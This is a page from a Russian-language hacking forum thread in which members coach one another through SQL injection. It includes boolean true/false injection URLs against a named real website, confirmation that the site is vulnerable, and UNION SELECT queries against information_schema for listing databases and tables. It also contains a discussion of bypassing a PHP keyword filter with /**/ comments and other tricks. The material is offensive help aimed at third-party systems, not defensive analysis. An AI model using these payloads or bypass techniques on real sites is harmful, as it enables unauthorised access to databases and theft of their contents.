HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1843 из 2422 « Первая < 8431343174317931833 1839 1840 1841 1842 1843 1844 1845 1846 1847 1853189319432343 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 03.12.2011, 02:51
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами: 9223466

Репутация: 3171


По умолчанию
Цитата:
Сообщение от shadowrun  
Колонок столько. Это сообщение выводиться в теле сайта, который загрузился (с контентом). А когда число колонок не подходит, сайт не загружается а только эррор маскуеля (на белом фоне черный текст ошибки).
Там несколько последующих запросов просто.

Выводи в ошибке, или же ищи вывод первого запроса.
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 03.12.2011, 08:37
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию
Цитата:
Сообщение от lightangel  
Is this really vulnerable?
Код:
http://www.gomlab.com/eng/forum.html?mode=announceView&a=125%27&no=
I've tried all attempts on it.
Код:
http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=1  TRUE

http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=2  FALSE
Yes, this is vulnerable
 
Ответить с цитированием

  #3  
Старый 03.12.2011, 13:38
lightangel
Познающий
Регистрация: 07.11.2011
Сообщений: 91
С нами: 7638806

Репутация: -6
По умолчанию
Sure. Well the problem is, I can't get order by or group by.

Can you just help a bit further?
 
Ответить с цитированием

  #4  
Старый 03.12.2011, 13:44
A_n_d_r_e_i
Участник форума
Регистрация: 02.09.2009
Сообщений: 286
С нами: 8784803

Репутация: 257
По умолчанию
Цитата:
Сообщение от lightangel  
Sure. Well the problem is, I can't get order by or group by.
Can you just help a bit further?
Yes, we can help if you write the url, where you "can't get order by or group by"
 
Ответить с цитированием

  #5  
Старый 03.12.2011, 13:53
lightangel
Познающий
Регистрация: 07.11.2011
Сообщений: 91
С нами: 7638806

Репутация: -6
По умолчанию
Thanks sir.

Код:
http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=1  TRUE

http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=2  FALSE
I tried http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=1(ord er by and string based= nothing works)

http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=2 FALSE(order by and string based= nothing works)

Any help now? Thanks.
 
Ответить с цитированием

  #6  
Старый 03.12.2011, 14:12
A_n_d_r_e_i
Участник форума
Регистрация: 02.09.2009
Сообщений: 286
С нами: 8784803

Репутация: 257
По умолчанию
Цитата:
Сообщение от lightangel  
Thanks sir.
Код:
http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=1  TRUE

http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=2  FALSE
I tried http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=1(ord er by and string based= nothing works)
http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=2 FALSE(order by and string based= nothing works)
Any help now? Thanks.
SQL-Injection in PostgreSQL DB

Part 2
 
Ответить с цитированием

  #7  
Старый 03.12.2011, 14:17
lightangel
Познающий
Регистрация: 07.11.2011
Сообщений: 91
С нами: 7638806

Репутация: -6
По умолчанию
Well received, thank you.
 
Ответить с цитированием

  #8  
Старый 03.12.2011, 17:59
Goodwin_
Новичок
Регистрация: 29.05.2008
Сообщений: 11
С нами: 9447607

Репутация: 10
По умолчанию
подскажите, вот есть запрос:

Цитата:
Сообщение от None  
+union+select+1,table_name,3+from+information_sche ma.tables
показывает имена всех таблиц.

такой запрос:

Цитата:
Сообщение от None  
+union+select+1,table_schema,3+from+information_sc hema.tables+where+table_name=0x0000
покажет имена баз данных в которых есть таблица с именем 0х0000?

ок, например после последнего запроса вывелось несколько имён баз данных. как получить имена таблиц из каждой по отдельности?
 
Ответить с цитированием

  #9  
Старый 03.12.2011, 18:05
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию
Цитата:
Сообщение от Goodwin_  
подскажите, вот есть запрос:
показывает имена всех таблиц.
такой запрос:
покажет имена баз данных в которых есть таблица с именем 0х0000?
ок, например после последнего запроса вывелось несколько имён баз данных. как получить имена таблиц из каждой по отдельности?
where table name='имя таблицы' and table_schema='имя_базы'

пора уже взятся за учебник SQL..
 
Ответить с цитированием

  #10  
Старый 03.12.2011, 19:31
trololoman96
Участник форума
Регистрация: 01.12.2011
Сообщений: 120
С нами: 7604246

Репутация: 55
По умолчанию
Есть такой вот фильтр

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$filter[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]] = array([/COLOR][COLOR="#DD0000"]"select"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"delete"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"union"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"update"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"insert"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\\"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]","[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]";"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"--"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"-"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"%20"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"%27"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"`"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"="[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"%"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$filter[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$op[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]) );

[/COLOR][/COLOR
И есть запрос в бд в котором он обрабатывает объект

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM admin WHERE login='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]adm_name[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"]);

[/COLOR][/COLOR
Обойти select,union можно пробелом внутри, в качестве разделителя /**/, запятые тоже не проблема. Не получается обойти кавычку, можно ли как то обойти это не пользуясь уязвимостями с мультибатовыми кодировками ? Ибо сменить ее нет возможности, может у кого есть другое решение...
 
Ответить с цитированием
Ответ
Страница 1843 из 2422 « Первая < 8431343174317931833 1839 1840 1841 1842 1843 1844 1845 1846 1847 1853189319432343 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.